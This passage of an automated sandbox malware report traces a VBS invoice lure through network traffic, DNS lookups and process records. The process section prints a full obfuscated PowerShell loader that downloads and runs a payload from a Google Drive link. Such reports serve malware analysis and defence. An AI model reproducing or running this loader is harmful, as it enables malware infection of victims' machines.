                                Apr 18, 2024 11:10:46.539081097 CEST49706443192.168.2.5173.194.219.101
                                Apr 18, 2024 11:10:46.541611910 CEST49706443192.168.2.5173.194.219.101
                                Apr 18, 2024 11:10:46.649791956 CEST49707443192.168.2.5142.251.15.132
                                Apr 18, 2024 11:10:46.649851084 CEST44349707142.251.15.132192.168.2.5
                                Apr 18, 2024 11:10:46.649921894 CEST49707443192.168.2.5142.251.15.132
                                Apr 18, 2024 11:10:46.650250912 CEST49707443192.168.2.5142.251.15.132
                                Apr 18, 2024 11:10:46.650269985 CEST44349707142.251.15.132192.168.2.5
                                Apr 18, 2024 11:10:46.874319077 CEST44349707142.251.15.132192.168.2.5
                                Apr 18, 2024 11:10:46.874475956 CEST49707443192.168.2.5142.251.15.132
                                Apr 18, 2024 11:10:46.877298117 CEST49707443192.168.2.5142.251.15.132
                                Apr 18, 2024 11:10:46.877322912 CEST44349707142.251.15.132192.168.2.5
                                Apr 18, 2024 11:10:46.877623081 CEST44349707142.251.15.132192.168.2.5
                                Apr 18, 2024 11:10:46.878554106 CEST49707443192.168.2.5142.251.15.132
                                Apr 18, 2024 11:10:46.924128056 CEST44349707142.251.15.132192.168.2.5
                                Apr 18, 2024 11:10:47.320902109 CEST44349707142.251.15.132192.168.2.5
                                Apr 18, 2024 11:10:47.320960045 CEST44349707142.251.15.132192.168.2.5
                                Apr 18, 2024 11:10:47.321016073 CEST44349707142.251.15.132192.168.2.5
                                Apr 18, 2024 11:10:47.321110010 CEST49707443192.168.2.5142.251.15.132
                                Apr 18, 2024 11:10:47.322633982 CEST49707443192.168.2.5142.251.15.132

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Apr 18, 2024 11:10:45.970403910 CEST5564153192.168.2.51.1.1.1
                                Apr 18, 2024 11:10:46.074609041 CEST53556411.1.1.1192.168.2.5
                                Apr 18, 2024 11:10:46.543379068 CEST6190653192.168.2.51.1.1.1
                                Apr 18, 2024 11:10:46.648977041 CEST53619061.1.1.1192.168.2.5

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Apr 18, 2024 11:10:45.970403910 CEST192.168.2.51.1.1.10x124eStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                Apr 18, 2024 11:10:46.543379068 CEST192.168.2.51.1.1.10xe0d1Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Apr 18, 2024 11:10:46.074609041 CEST1.1.1.1192.168.2.50x124eNo error (0)drive.google.com173.194.219.101A (IP address)IN (0x0001)false
                                Apr 18, 2024 11:10:46.074609041 CEST1.1.1.1192.168.2.50x124eNo error (0)drive.google.com173.194.219.138A (IP address)IN (0x0001)false
                                Apr 18, 2024 11:10:46.074609041 CEST1.1.1.1192.168.2.50x124eNo error (0)drive.google.com173.194.219.139A (IP address)IN (0x0001)false
                                Apr 18, 2024 11:10:46.074609041 CEST1.1.1.1192.168.2.50x124eNo error (0)drive.google.com173.194.219.100A (IP address)IN (0x0001)false
                                Apr 18, 2024 11:10:46.074609041 CEST1.1.1.1192.168.2.50x124eNo error (0)drive.google.com173.194.219.113A (IP address)IN (0x0001)false
                                Apr 18, 2024 11:10:46.074609041 CEST1.1.1.1192.168.2.50x124eNo error (0)drive.google.com173.194.219.102A (IP address)IN (0x0001)false
                                Apr 18, 2024 11:10:46.648977041 CEST1.1.1.1192.168.2.50xe0d1No error (0)drive.usercontent.google.com142.251.15.132A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • drive.google.com
                                • drive.usercontent.google.com

                                HTTPS Proxied Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.549706173.194.219.1014435960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                2024-04-18 09:10:46 UTC215OUTGET /uc?export=download&id=1ofhpnBPLuvCfhTdXGSUznLMdSpVJ13u0 HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                Host: drive.google.com
                                Connection: Keep-Alive
                                2024-04-18 09:10:46 UTC1582INHTTP/1.1 303 See Other
                                Content-Type: application/binary
                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                Pragma: no-cache
                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                Date: Thu, 18 Apr 2024 09:10:46 GMT
                                Location: https://drive.usercontent.google.com/download?id=1ofhpnBPLuvCfhTdXGSUznLMdSpVJ13u0&export=download
                                Strict-Transport-Security: max-age=31536000
                                Content-Security-Policy: script-src 'nonce-PSu17ZhsIzuAEbUfx4ee3A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                Cross-Origin-Opener-Policy: same-origin
                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                Server: ESF
                                Content-Length: 0
                                X-XSS-Protection: 0
                                X-Frame-Options: SAMEORIGIN
                                X-Content-Type-Options: nosniff
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Connection: close


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.549707142.251.15.1324435960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                2024-04-18 09:10:46 UTC233OUTGET /download?id=1ofhpnBPLuvCfhTdXGSUznLMdSpVJ13u0&export=download HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                Host: drive.usercontent.google.com
                                Connection: Keep-Alive
                                2024-04-18 09:10:47 UTC2120INHTTP/1.1 200 OK
                                X-GUploader-UploadID: ABPtcPoWPEr_VerKc5NGcVUQjKWh0fnaOqwLnR_bruXODvUx52YXOU5JsNDqLHQ8ltoRSQdpYLY
                                Content-Type: text/html; charset=utf-8
                                Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                Pragma: no-cache
                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                Date: Thu, 18 Apr 2024 09:10:47 GMT
                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                Content-Security-Policy: script-src 'nonce-8ilXso1TUhpfPRo8nlV3Lg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                Cross-Origin-Resource-Policy: same-site
                                Cross-Origin-Opener-Policy: same-origin
                                reporting-endpoints: default="/_/DriveUntrustedContentHttp/web-reports?context=eJzj0tDikmJw0JBisN47ndUeiJ3SZ7CGAPHqn-dY1wPx4rDzrCuAWIibY_rx5o1sAge2r68BAO_cFM0"
                                Content-Length: 1692
                                Server: UploadServer
                                Set-Cookie: NID=513=hnkh5huC6dt6FGERI_C2UY4ScMKU0jCpqqRAlHc-qNOjNMHu3GiJ_1OGIJl-x7GpDWtvEwXP1hvUmcRS7e2fwKhJgUEXqpWfbuhW3Mnz1ranUF0Uk67vI-ooSzgG1DLJ0J35Kzre0G4fkMKlMBvCFzDjUYChTQ6J-nlpeqH1wT4; expires=Fri, 18-Oct-2024 09:10:47 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Content-Security-Policy: sandbox allow-scripts
                                Connection: close
                                2024-04-18 09:10:47 UTC1692INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 47 6f 6f 67 6c 65 20 44 72 69 76 65 20 2d 20 49 6e 66 65 63 74 65 64 20 66 69 6c 65 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 53 37 49 5a 57 67 6d 4c 50 34 45 73 70 4f 72 49 68 31 43 50 77 22 3e 2e 67 6f 6f 67 2d 6c 69 6e 6b 2d 62 75 74 74 6f 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6f 6c 6f 72 3a 23 31 35 63 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 75 72 73 6f 72
                                Data Ascii: <!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="QS7IZWgmLP4EspOrIh1CPw">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:11:10:40
                                Start date:18/04/2024
                                Path:C:\Windows\System32\wscript.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA24021151 - BP.vbs"
                                Imagebase:0x7ff6da870000
                                File size:170'496 bytes
                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:2
                                Start time:11:10:42
                                Start date:18/04/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kummelnweaving = 1;$Bredders130='Substrin';$Bredders130+='g';Function Fjter($Olericulturally){$Kummelnterdivisional=$Olericulturally.Length-$Kummelnweaving;For($Kummel=5; $Kummel -lt $Kummelnterdivisional; $Kummel+=(6)){$Endocoele67+=$Olericulturally.$Bredders130.Invoke($Kummel, $Kummelnweaving);}$Endocoele67;}function Jardiniere($Overparticularity){. ($Lflaskernes) ($Overparticularity);}$Heltalsdivisions=Fjter 'BetimMSourcoBa,rizS,ouxiBousol Ove.lDe sia M,du/Erh.e5Hrels.Impla0 Bal, .ran(.rstaWpaafuiSaltknIntond nddooNonrew UdbosExplo ProwlNPosteT Dig, ,mph1Comor0 Bes . Xyl 0Knokk;Fugac Ga.seWdeseriEksplnTeko 6eksem4 unap;Vil,f ,iscoxIndls6Skder4,corz;no,ar P.pnsrEtiopv Uopd: Ch,f1Str,g2 D.da1 Cre .Moron0Aksel)Baysv InkshGdermee CicecLa sekana ho Loin/ K,us2Zec i0Mortr1Vigep0 Para0Delta1 Misu0Boble1Puche Peri.FDevasiBogorrSk.dee Flodf I,vioTurboxce.tr/Teuto1 He t2 Ra,e1Vulga.K.nne0 P.ls ';$Maskinkoderne=Fjter 'Kry pUSvar s kanteBu.ikrAn ev-,ardiABehaggHemaneMolucnCerebtrekyl ';$Exencephalus=Fjter ' S.rihPourptHaemut,mugip Hepas Annu:quill/Cikad/Bonded Urobr edtsiFinagvSvovleHyper.,ugtsg MarkojumbuoTryghgUdledl To.ae .tat. UnnocOm.aloPhlegmDisjo/codicuAasencR,neb?KursceBoothx Abdop .ealoDotyerBi,iotQuadr= Jewed BrimoHydrowudplanDornel SaucoSolilaBombadOmmbl&TurnuiBalgedPolyp= Luf.1 r dso I osfBrnephPsyc p UnabnUhaanB BenePAkutiLSttteuinterv Syn,CMo.orfE.cashChicoTTtskrdFantaXFaareG ibriSGle.sUTypeazu,vidn SideL ightMDevovd SamdS SammpForgaVFri,iJ.doli1Afret3Kir.nulicit0 shir ';$typhloempyema=Fjter 'Udlev>.erti ';$Lflaskernes=Fjter 'AvlshiBortfeUn,rmx pio ';$Nonpainter = Fjter 'Truele TriecGuldhhBuccaoFo.si Begiv% ShadaBiddapRum.opV,sitd enataCharmtNepe aOvers% Udva\ MangmEna.eiMacuscUnsugrDal.oo Umisd CornaBellicT lsttAfrivyBop.elOverso TyrauAutofsHalst.CalceA ingsaNonprrCoevo Eppyd&Mi.da& S lv MaterebundfcB ligh PikioAften Pitto$ Joy. ';Jardiniere (Fjter 'Nippe$KnlesgSnus.lFodb,o,fskebPr,smaDet,mlAccro:N nexFA korjGippoe JuverAppe,dtilpleHystedHab,reFagall DyresRikocnSlaanokreoldPat,be.rederJivesn L goeIndfr=Fla,o(diarhcOrdremBodsvdGrav Opgan/skamrcOsten Del $G.senNcarraobent nFlyflpFodsvatelegiKr.dinCarrotEpicle As.erCoun,)Famil ');Jardiniere (Fjter 'Dekla$Rvestgtals lC onkoBirkebPassiaOverultopar: InteGFo.keawea.en Co,ogDesi.rBeklaeRecollUnpej=scolo$,arnfE JetsxKat aePec,sn dkslcB.rnieHa hop BranhFaar.aStetilOleoduModresMonod. Gru.sMe,kipSengel Silki FroctFolke( beha$ K astTousey hulepA.unchDittalStofloHjlp e Puszm SugepVemodySp,ereAghasmPlatyaRidgi)Dyste ');$Exencephalus=$Gangrel[0];Jardiniere (Fjter 'Unita$udlsngEtlarlAnd,noUnsa.bBr,mia RuinlRodte:Concio Ingevderuie Multrr.debpCocknlIn.bsu.adiomLingvpGener=InforNHome,eHandlwPsych- DaubO N.ckbF,ltpjDisabeDe.oncStatstEpig, Kenn S.rogry Ho,ss Udmnt Excle.uperm ,oor.SpaltN Tri.e ,krit Cuph.Bal.nWTao,ieIntoxbBeflaCSubcalTrizoiBalaneAfdranafbagt Bro, ');Jardiniere (Fjter 'Nymar$S,ksaoSo,iavMicroeKomplrMorbipapotelRecipuPomacmH.tetpYvo,n.KommiHPathoe SupeaEjenddDialyeProbarAggrasCompo[Fiske$Orbi MVinteaDekorsDiktek.ommaiOrthonUnsetkPagino .ntadVarleeIngrarOversnspille B ss]Anten= Sty,$TalmuH SalseUn.ecl.ampyt RegeaBronzlPell,skofoedDerm i ProjvA.egrideflos Kreei nogtoAlpehn Perisarbe. ');$Catholicly=Fjter 'App,aoGen,nv HjoreBesoiruredtp,astrl Libeuoeve mVievapVaren.OvergDSy,enoH,lmewV,dtlnDyrehlStadso,egisasammedAriusF .ektitu erlUnr ge,poke(Solen$.olleEBoundx,ostrePrsennGrittcPreheeRottep Div,hSociaa yvel NoncuVic,is Idea,Feltt$GenspHPr vim Ratin FeweiForebn El,mgraads5 Part6Kaste) anus ';$Catholicly=$Fjerdedelsnoderne[1]+$Catholicly;$Hmning56=$Fjerdedelsnoderne[0];Jardiniere (Fjter 'Helfa$ B,skg ionol Baa,oBandobDynebaIndkolRoman:Qui zUMembrnChorad ReeteDrypsrprot k Op keUlvemnTensidUbu.deSputtlCanoes Be.keS rofsB ndb=Forto(AchloTAndedeCot esAandstEncli-ChaotPKat gaOplritMacrohS eti Pr.a$Art,yH FejlmIso.onFossiiQu.ntnT.ctog Reg 5Growt6Shirt) Stri ');while (!$Underkendelses) {Jardiniere (Fjter ' For.$ BasigAgatil .olioArchebfagotawalk,lSakes:KrimiCSkar,aVelafu Ek olidoliiLitigcNedruuBhutslBrevti skov=Relfo$Apocot,iscjr prinuProtoeAstri ') ;Jardiniere $Catholicly;Jardiniere (Fjter ' ntaiSRigsatAttriaAn.ierLoggetFiltr-Unp,lSWarkhlEftere etekeArbejp Linj Kawik4Inapp ');Jardiniere (Fjter ' ,ika$SylfigTeletlHemi o patlbKasi aCruellMestr: LeylUCholen Phl,d CinteRevaprOolitk G,ldeAkvarnN dvudP,ayeeExtenlam.trsA moceRekursFre.m=Dan.e(K imiTSun.oeColopsB andtBox u- AlloPB,odaaregult efeuhCun i aggra$ Kos,H,ynelmEmbryn ArthiMandsn BlesgLight5Indka6Sikke)Tilhr ') ;Jardiniere (Fjter 'Vurde$JernbgStrabl issoUnderb torfa BlomlU,nst:EskalTR ulerErgonidispohAffaleBrillmSpar iLoreno ZoopbDamevo,ursulSmattiS.aveoFinannTauro=Disfu$Racemg M.lilTegneoMagnebsagfraBeslulFissi: BrukR s ame,eilekBiblir and eZygo.e Stjer Asyne everdAcce.eH,rbw+Besky+Under%Lisss$TungmG,reska Ru.lnCockpgBannsrOligoe,olypl.hyto.GavstcSociaoRakkeuS ikanBil at Drak ') ;$Exencephalus=$Gangrel[$Trihemiobolion];}Jardiniere (Fjter 'Repar$DemargSunscl BideoGlycob Chuma Cl.cl Natu:.tninGAlminaSext.l Udpaa aadncStevetBanjeoMetabpAdverh Ps,cl ryggeAculebSurwaiOctaht B.azi,estrsMa.lg Afpud=Spe,i OpbygG Kirke,orspt Subh- DjrvCIntero Se,inOvergtFortjePar nnSk.altRece xtr$TumblHlibermHelafnMa olia.tranCordigInt.r5Uddat6Epita ');Jardiniere (Fjter 'Bundf$OutrogJuniolBizaroBesvrb St,ra,urfulTykta: ibizOMonilpBittedOverta VenatS.edieInforrDerobi Aftan Jul gD,stas AdvooRhi or SenddkonjanEsplaiCon.inLnintgeige.1 Ren 3 Kr,g7 Sk.a monos= Ful, Ceme[ lassSOpbl ySmartsD.osctKatj.esu scmStor,.RddikCExamioSlsetnIndbrv Dis eBook.r UdvitSent,]Repr.: Dope:PummeFSummarCarmoo ExodmFlintBAr ejaPyo.es Aeroe sang6 Over4BestrSFamilt SondrFertii PolenBypasgHala,(Ratfi$Gi miGMitisaHo,osl BalaaKontocBnkbltSkibboBostop,randhFrem.l Ca.te c,ilb NewbiEmbartEvindi,sychs Cao,)Betal ');Jardiniere (Fjter 'Lid,b$ConstgSweatlMinasoScripbHoveraU derl Ka,r:Mili.FCarlsu.efallCa,hedBushtgBadeloUre,mdLyk.seResen2 Mam 4 Ov,r4Imma H art=Phlog Mn.de[BindeSDrasty DetusSkilltHo.ogeRullemKnown.Omty Tasylre HellxSli.etHo ed.,ygniESeamsnDeserc UnreoFornidS mmeibestnnGrammg P ni]Unint:Recen:BrnevABorstSditikC Raa,IBourgI For . lfenGplanaePre.rtFore.SUndertQuodlr SulfiBesm.nVitalg Sger(Snigg$Sul.aODepilpUds,rdDidacaUler t Dapie Brsnr MaltiTr.konUndergSquansK,oldoAnticrAnteddSydafnCharsi,nplan bus,g Awa,1Kunde3 Plat7Dyref)Ouden ');Jardiniere (Fjter 'Endev$TheregskriglPinnaoEfterb Ext aFrikel Efte: SagsBEpikujInspae hy.rr Unc.gsundhe rat rGnomos,augh=Fo de$SammeFSuppeuKrantlSnobodDetong ,ervoBrochdUnreceSlaae2 Soli4 Se v4Stueg. Met sPol.tuFor ubSulphs CondtTilfarBestriUndernT aadgSpurv(Huski3Semes2haras7Frime1Ra en6Ind p4Erant, Ajou2Lath 7cring1Amora9Gluie6Koble) Muni ');Jardiniere $Bjergers;"
                                Imagebase:0x7ff7be880000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:3
                                Start time:11:10:42
                                Start date:18/04/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:4
                                Start time:11:10:44
                                Start date:18/04/2024
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\microdactylous.Aar && echo $"
                                Imagebase:0x7ff7f64a0000
                                File size:289'792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Executed Functions

                                  Function 00007FF8490040B9 Relevance: .5, Instructions: 460COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2180723396.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bbe81fff7bb1990f356482965f61567972dd7bca06c7f305e9a1dfd46aa6f72f
                                  • Instruction ID: c25f6cf063f2dcb123ca27624a253c8d5911c8413f80fbac760cc0503fe1b162
                                  • Opcode Fuzzy Hash: bbe81fff7bb1990f356482965f61567972dd7bca06c7f305e9a1dfd46aa6f72f
                                  • Instruction Fuzzy Hash: 3FE1F331E0EACA4FEBA9EF2868556B57BE1EF55390B4801FAD40DC71D3FA28D8018355
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00007FF849007D95 Relevance: .4, Instructions: 431COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2180723396.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3898c654a2c1ef482ecfe09ae07650257f6c5c9ef27153776f6fa88671214f6c
                                  • Instruction ID: 98e809697bd43616dae25b2270ed0e522ca2e28a355fafc51ff7d08f58c57fb6
                                  • Opcode Fuzzy Hash: 3898c654a2c1ef482ecfe09ae07650257f6c5c9ef27153776f6fa88671214f6c
                                  • Instruction Fuzzy Hash: 23D11231D1EACA9FEBA9AB2868556B67BE0FF55390F0401FAD44DC7193EA1CEC018351
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00007FF8490055BE Relevance: .2, Instructions: 182COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2180723396.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 799563798e1cdb4fb0a0ce474f572d7aeae3f04f1f6a9d27535529b694645ece
                                  • Instruction ID: d1bd159d3460b62f5e7b32ec14e3e905ce75a6ab9846e22f5b18c6a1709545e6
                                  • Opcode Fuzzy Hash: 799563798e1cdb4fb0a0ce474f572d7aeae3f04f1f6a9d27535529b694645ece
                                  • Instruction Fuzzy Hash: B951B06180E7C55FEBA79B382C285A67FA4EF53254B1D00EBD0C8CB1D3E9089C49C366
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00007FF849004257 Relevance: .2, Instructions: 150COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2180723396.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7f4b97718376b53f0de714a708b137c549d787b3accc7d9e0cfdcc04169e678a
                                  • Instruction ID: 3e1184706118ee09df835bfa69163e5c1ab8901253278f65eeb9f3fbfd99b4e6
                                  • Opcode Fuzzy Hash: 7f4b97718376b53f0de714a708b137c549d787b3accc7d9e0cfdcc04169e678a
                                  • Instruction Fuzzy Hash: 03419031E1EACA5FEBA5EB28685517576E1FF552A0B9801FAD01DC31E3FE1CE8408315
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00007FF848F33945 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2180389933.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                  • Instruction ID: 5581c1bbeeb35668f75aff93aa97cf07b4c35495046711a11288b2c77098a6b1
                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                  • Instruction Fuzzy Hash: 4001677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695D736E881CB45
                                  Uniqueness

                                  Uniqueness Score: -1.00%